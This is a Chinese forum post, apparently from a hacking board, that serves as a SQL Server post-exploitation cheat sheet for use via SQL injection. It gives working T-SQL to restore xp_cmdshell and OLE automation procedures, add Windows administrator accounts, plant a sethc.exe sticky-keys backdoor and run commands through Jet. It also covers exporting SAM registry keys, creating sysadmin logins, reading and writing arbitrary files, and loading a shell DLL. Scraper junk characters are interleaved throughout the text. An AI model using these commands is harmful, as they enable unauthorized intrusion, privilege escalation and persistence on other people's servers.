标题: XP_CMDSHELL恢复方法大全 [打印本页] 作者: admin 时间: 2012-9-15 14:37 标题: XP_CMDSHELL恢复方法大全 1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号 7 O$ k8 X: t: h2 ?) o恢复方法:查询分离器连接后,% A& x$ J( d0 C$ K8 i \
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 7 k; @& N4 m0 i4 M2 G A9 _, h
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 1 L" a; w- S+ F
然后按F5键命令执行完毕 8 N5 A- A, q8 w+ Q4 R4 S( e4 \- t. U; \- M* J
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): I# L, @" L3 y# Q
恢复方法:查询分离器连接后, $ o! u9 i' r9 T第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"' T5 {/ b( F f4 a( S
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' . B {# D" `$ |% n8 F然后按F5键命令执行完毕 # d- _! A0 R$ a0 Z2 ]. I : w0 H* [- o) T1 O3 t3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 0 O- K- p5 o+ } {5 U3 ? T恢复方法:查询分离器连接后,& h; | Q/ R' P) @* r$ ?" a+ `
第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 7 i2 i4 ?* _6 O第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 5 R" h' o0 T8 w/ {' B0 s然后按F5键命令执行完毕6 i, ]( ]9 O7 p r1 w( T; D9 P
5 M" R. Z6 `( Z$ W* R
4 终极方法.% K9 ]% z9 Q8 z& U$ {0 k) n
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:) ^+ ?# l v3 e: o H* R
查询分离器连接后," i( {6 `. d, ~! \
2000servser系统: 5 }; r8 y# x2 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add' 2 T! c6 p, z5 g/ ]2 V/ u. h5 C& M8 D- o. _: P; h+ Y/ W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'7 x7 ^, t0 A( `" ^# \
7 Q. r% |! T/ O* _/ O( g
xp或2003server系统:, v Z0 R3 ?% n: [/ Z
& R: U1 m: }/ K, P* _: g; i0 A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'& f, S! q1 o( U" ^, {5 e
& X/ s0 h% f+ _3 t, G: E8 Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'0 i. ~. j: N" Q
$ P& w% Z' b- _+ e2 d" ?: F8 q( v) D1 r8 }' L6 E
五个SHIFT, x3 a1 p& l. H# E
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';7 M2 u# U1 `3 V! F8 Q3 m- w _
?3 O( J1 a# _' q7 adeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; - r6 A. [9 o) r: b ?! L
1 r1 c9 B) `0 x! V
xp_cmdshell执行命令另一种方法) M" c& \1 ?* h
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' 6 e W3 @8 j: @/ n U5 f( u
% Z0 k7 L, j2 y5 U1 T) K
判断存储扩展是否存在. ]) i& k# q, N
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell', f1 e' Y4 [% j
返回结果为1就OK) N7 u4 Q/ \7 \% g: @
4 \' G" D$ R2 I( I
$ S: ^/ q. i, q3 B, \- U5 Z
上传xplog70.dll恢复xp_cmdshell语句: 3 Z/ h. s- m4 I: D# dsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'% n* I) M9 m; |5 v
9 W5 v' o/ m7 t否则上传xplog7.0.dll1 w5 K0 Q& C. `/ |7 Y
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'. G% Y4 S, m) @6 [4 [- D. @% m
* {; b% { D( c' x
! G4 @, \# p; v5 b, r: V7 D/ B1 I. ]& o
首先开启沙盘模式:( [, T. ]0 Q% ^# j n2 e3 p6 [! W
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 % ~, @$ `9 G' k4 D4 ^3 H* O: p4 u* m . T$ A) v* M. |: k9 p' ^" e然后利用jet.oledb执行系统命令8 }% q, q% n3 A3 t6 j R8 ?
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') - e/ p6 L) T1 N0 ?# S返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了 8 e; C/ }) \0 z9 E6 r. \5 G" \4 ^% K& ]( ]! e8 u) e0 }" r5 ^
+ e/ d6 U& Q. b7 }' w
+ ?+ i( j3 {' f+ | N恢复过程sp_addextendedproc 如下: : | N$ r) U+ w: }* tcreate procedure sp_addextendedproc --- 1996/08/30 20:13 6 ], }9 Q! x4 c! M@functname nvarchar(517),/* (owner.)name of function to call */ * n6 c+ g0 k2 V+ {" V0 m; D@dllname varchar(255)/* name of DLL containing function */ 7 ~1 }! v/ Q k b
as * J( K" |4 J) r j% b
set implicit_transactions off : c- e- v: H! _* K7 |: r. Cif @@trancount > 0 8 [, F* H6 J% `4 W4 lbegin 1 c; {3 C) W- e' w+ nraiserror(15002,-1,-1,'sp_addextendedproc') 1 u0 v b/ {* ]9 s+ Dreturn (1) % S; z% O9 X6 o: Y0 iend 4 Y) j6 {& \' o/ K( c y# idbcc addextendedproc( @functname, @dllname) 3 H+ K+ ?& S8 P q" X+ V
return (0) -- sp_addextendedproc 2 k) a; D! d2 [' ^
GO , i5 p! @6 J4 e4 s9 T
! N& T* g' m5 _4 b6 H" b+ p8 i
* N, F+ E h, y; [ l$ \. x - x2 L- {/ x2 `5 @7 I- f4 i- X导出管理员密码文件+ Y) T; v- G- z x
sa默认可以读sam键.应该。2 e( N0 _0 M. M. {
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg $ E. y6 K# K7 T i" F! p0 ?net user administrator test2 H4 K6 [# m5 {5 N& V1 S1 ], p+ G# k
用administrator登陆.% a# J- f1 l% C9 V
用完机器后3 V/ @; \# p, ~3 v/ H9 o" G
reg import c:\test.reg ; y0 M1 P$ v8 z' u. c根本不用克隆.. V: ]: {) ^% ]& \6 j: m% L
找到对应的sid. 7 l: j2 i+ s8 X : ?/ f: _8 J7 p9 D' `# q2 t, @ ! y! |) L# p6 ?/ [( F7 |+ @6 L( E' ]8 L3 }2 A+ o
恢复所有存储过程 / [1 H$ _9 J) S g( |- o( |' Iuse master $ k# \+ ?5 |4 F# n- \5 R8 J( M2 `exec sp_addextendedproc xp_enumgroups,'xplog70.dll' . t, q9 F+ j3 F$ X5 {
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' ; R8 R( j, P+ Q- ^. M5 b/ ]
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' ; o8 Z6 K5 |3 z$ K5 o3 x$ Hexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 4 Z9 @) Y- F4 k0 E! x% I
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 6 H) Z' P2 Q( S" ^
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 5 R) r! _) m; s1 J) j a/ vexec sp_addextendedproc sp_OADestroy,'odsole70.dll' : p5 }; _0 d) ?
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' ' K- w$ z( I! \3 S9 f, Nexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' ; V( L: K/ h1 d, i* Q& M9 u, c( Z
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' # U x1 w- c* c' Qexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' 3 S/ V7 i) w, Z3 _, a4 X
exec sp_addextendedproc sp_OAStop,'odsole70.dll' - Q/ N6 V: f/ f' f
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 1 k) w$ ]4 k# A, Eexec sp_addextendedproc xp_regdeletekey,'xpstar.dll' Q" P' u* I2 W L5 @
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' / U1 {& K( ~: Z, ]% w/ Q0 g. R
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' # I" b# h; P" _& a, a K# u
exec sp_addextendedproc xp_regread,'xpstar.dll' " h7 g6 I) b% U# F
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' * s( }+ Y2 N# I1 C7 n3 Eexec sp_addextendedproc xp_regwrite,'xpstar.dll' $ A- Z8 l0 J5 N/ X+ ^ c9 e e
exec sp_addextendedproc xp_availablemedia,'xpstar.dll' 7 e4 ^0 C' F J9 _: T1 }, I * C* y, u4 N2 i " i8 c" T# O6 H. e9 W) p建立读文件的存储过程 4 T) ]1 d. q+ G( o$ V" n" Q9 ?Create proc sp_readTextFile @filename sysname" k4 W9 T/ s9 b% A8 Z8 c2 X
as " q' s1 W" l' L 6 q2 |: s$ h1 c+ G! ]4 c6 f B begin : I" f! G- Y; ^! C1 u+ w; W set nocount on 1 b. x+ p; ?6 e) O Create table #tempfile (line varchar(8000)) . n5 i' P2 Y* T7 x( I# ? exec ('bulk insert #tempfile from "' + @filename + '"')7 s6 a* D. w. k& a/ x- z
select * from #tempfile ) y1 W) j4 ~0 E! Q$ J# n3 \0 Z drop table #tempfile6 _6 N' {1 l1 s4 ]) G
End* F/ B4 }+ ?# t) Z* M
, S% L8 [- g& ?; U- |
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件& b }2 t' x5 [% x( ?
查看登录用户 ! R2 g" i* f% e4 [0 sSelect * from sysxlogins/ i/ t8 \, Z7 u4 {2 J
2 i% V6 W4 m. p! u* w把文件内容读取到表中* n8 R; J( }+ L8 ~2 i, e, h
BULK INSERT tmp from "c:\test.txt" ( H# c) R1 M' Z$ B' ?dElete from 表名 清理表里的内容7 k9 x% z1 C2 k7 [3 M
create table b_test(fn nvarchar(4000));建一个表,字段为fn / H4 Q- W& ], s5 |5 A* T * N( D. U' ]7 D 6 r* O/ h. H) F, o+ R% a* D$ m- {4 n加sa用户 3 {* f& E3 f, J7 N( |3 mexec master.dbo.sp_addlogin user,pass; 3 d5 g, i/ e, e" kexec master.dbo.sp_addsrvrolemember user,sysadmin ; W: ~/ T0 |$ R6 ~ 0 g1 ]' o* ~! X: b- [ # j4 P% m5 e$ T6 k. ?% L: W- B, C' j; [$ M2 D6 B6 @6 G
读文件代码 & b) h. _3 E! V' Y: M8 ~2 Edeclare @o int, @f int, @t int, @ret int 4 s- t- j7 E8 L4 c5 m: ]. j# qdeclare @line varchar(8000) ; z d, {5 P o* X" y' }exec sp_oacreate 'scripting.filesystemobject', @o out6 G7 g; U$ Z! I; i- w7 [, x
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1 ' @- a2 b2 b2 e# S+ r( f* l1 C' c! K# ^$ Aexec @ret = sp_oamethod @f, 'readline', @line out3 X$ s" W7 i v% Z; _$ u+ P/ K
while( @ret = 0 )6 z8 x. F2 | z/ a+ H% U
begin9 I- `9 X4 n6 r
print @line # x4 g% O, a; |6 Oexec @ret = sp_oamethod @f, 'readline', @line out1 e8 O( _" ^4 w# B% ^* S$ s
end * e0 O8 o+ \; ]9 s. W $ ~( B$ K" c P0 G6 R7 O0 k- Y8 o. v ' f9 d9 I. b: J& r( _ v4 U& Y- d写文件代码: 3 v3 z( f, t" `; N$ wdeclare @o int, @f int, @t int, @ret int # `1 F% R/ o& ^6 g/ [exec sp_oacreate 'scripting.filesystemobject', @o out+ t+ F5 T! t) R
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1. q3 `7 D1 v. A# \2 T8 U
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》% p; S% y' L* H3 M8 e' X$ S9 f" P) j. d
6 X/ t0 l5 c l1 X% v6 f) s - y: M. I) W( a4 Q添加lake2 shell- _' t3 [, ]' N) E. J
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll' ! v# v. d$ \: Y& r6 Ksp_dropextendedproc xp_lake29 D$ Z( l/ l7 \* l- ]$ n& \; [& z. L
EXEC xp_lake2 'net user'& Q! t- c$ X5 Y& S* s" M% L
0 k% H3 }- S) i5 u( j4 @4 d3 V: t